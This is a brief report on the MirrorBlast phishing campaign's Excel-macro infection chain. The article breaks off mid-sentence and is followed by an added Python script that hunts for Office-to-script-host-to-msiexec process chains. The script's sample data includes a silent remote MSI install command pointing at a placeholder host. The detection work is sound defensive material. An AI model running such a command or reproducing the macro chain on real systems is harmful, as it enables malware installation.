A fresh variant of a phishing campaign has recently been detected. Nicknamed MirrorBlast, it targets finance enterprises. Its attack method relies on malicious Excel documents that are almost untraceable.
MirrorBlast: How Does It Work?
The new phishing campaign was discovered by researchers at Morphisec Labs. According to their report, here is how MirrorBlast works:
- It uses obfuscated malicious code.
- The macro code can only be executed by a 32-bit Office version.
- After the target opens the compromised file and clicks on “enable content”, the macro executes a JScript script.
- This then triggers the download and installation of an MSI package.
- Before this, however, the macro performs an anti-sandboxing check: it establishes whether the computer name and the user domain are the same and whether the user name is “admin”.
- The MSI package has two versions: one uses the programming language REBOL, the other KiXtart.
- REBOL version: base64 encoded, its role is data exfiltration, for instance OS version, user name, or architecture. The second stage follows, in which PowerShell is initiated through the C2 command.
- KiXtart version has also the
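
The chain reported above (Excel macro, then a JScript script, then an MSI download and install) can be hunted for in process-creation telemetry. The following is an added example, not code from the Morphisec report; the process names, the event layout and the sample events are assumptions constructed for illustration.

```python
# Added example: hunt for Office -> script host -> msiexec in process-creation events.
# Process names and SAMPLE_EVENTS are assumptions constructed for illustration.
OFFICE = {"excel.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}  # assumed JScript hosts
INSTALLER = "msiexec.exe"

# Constructed events: (pid, parent pid, image name, command line)
SAMPLE_EVENTS = [
    (100, 1, "explorer.exe", "explorer.exe"),
    (200, 100, "excel.exe", 'excel.exe "C:\\Users\\u\\Downloads\\report.xls"'),
    (300, 200, "wscript.exe", "wscript.exe //E:jscript C:\\Temp\\a.txt"),
    (400, 300, "msiexec.exe", "msiexec.exe /i http://files.example.invalid/p.msi /qn"),
    (500, 100, "msiexec.exe", "msiexec.exe /i C:\\Installers\\vendor.msi"),
    (600, 100, "excel.exe", "excel.exe"),
    (700, 600, "msiexec.exe", "msiexec.exe /i C:\\Installers\\addin.msi"),
]


def ancestors(pid, by_pid):
    """Yield the image names of a process's ancestors, nearest first."""
    seen = set()
    while pid in by_pid and pid not in seen:  # 'seen' guards against PID loops
        seen.add(pid)
        ppid = by_pid[pid][1]
        if ppid in by_pid:
            yield by_pid[ppid][2].lower()
        pid = ppid


def find_suspicious_installs(events):
    """Return msiexec launches under Office that pass a script host or fetch a remote MSI."""
    by_pid = {e[0]: e for e in events}
    alerts = []
    for pid, _ppid, image, cmd in events:
        if image.lower() != INSTALLER:
            continue
        chain = list(ancestors(pid, by_pid))
        from_office = any(a in OFFICE for a in chain)
        via_script = any(a in SCRIPT_HOSTS for a in chain)
        remote = "http://" in cmd.lower() or "https://" in cmd.lower()
        if from_office and (via_script or remote):
            alerts.append({"pid": pid, "chain": chain, "remote_msi": remote})
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_installs(SAMPLE_EVENTS):
        print(alert)
```

Only the installer launch that descends from Excel through a script host is flagged; the installs started from the desktop shell, and the local add-in install started directly by Excel, are not.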